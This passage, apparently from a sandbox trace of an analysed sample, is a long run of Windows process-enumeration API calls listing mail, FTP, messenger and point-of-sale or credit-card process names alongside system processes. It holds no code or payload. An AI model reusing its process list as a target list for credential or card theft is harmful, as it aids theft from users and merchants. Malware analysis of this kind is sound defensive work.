th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.675] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.676] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.678] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.679] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.681] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.683] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.686] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.689] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.691] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.692] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.694] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.695] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.697] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.730] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0245.732] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0245.733] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0245.735] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0245.736] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0245.738] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0245.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0245.741] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0245.742] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0245.744] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0245.747] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0245.748] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0245.750] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0245.751] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0245.753] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0245.754] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0245.756] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0245.757] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0245.758] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0245.760] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0245.763] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0245.764] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0245.766] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0245.767] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0245.769] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.770] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.771] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.773] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0245.774] CloseHandle (hObject=0x1b08) returned 1 [0245.774] Sleep (dwMilliseconds=0x64) [0245.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0245.912] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.913] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.914] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.916] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.917] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.918] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.920] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.921] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.922] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.924] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.925] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.926] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.928] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.929] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.930] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.932] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.933] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.934] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.936] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.937] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.938] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.940] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.941] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.942] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.944] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.945] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.946] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.947] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.984] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.985] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.987] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.988] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.989] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.990] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0245.992] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0245.995] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0245.997] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0245.998] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0245.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0246.000] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0246.002] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 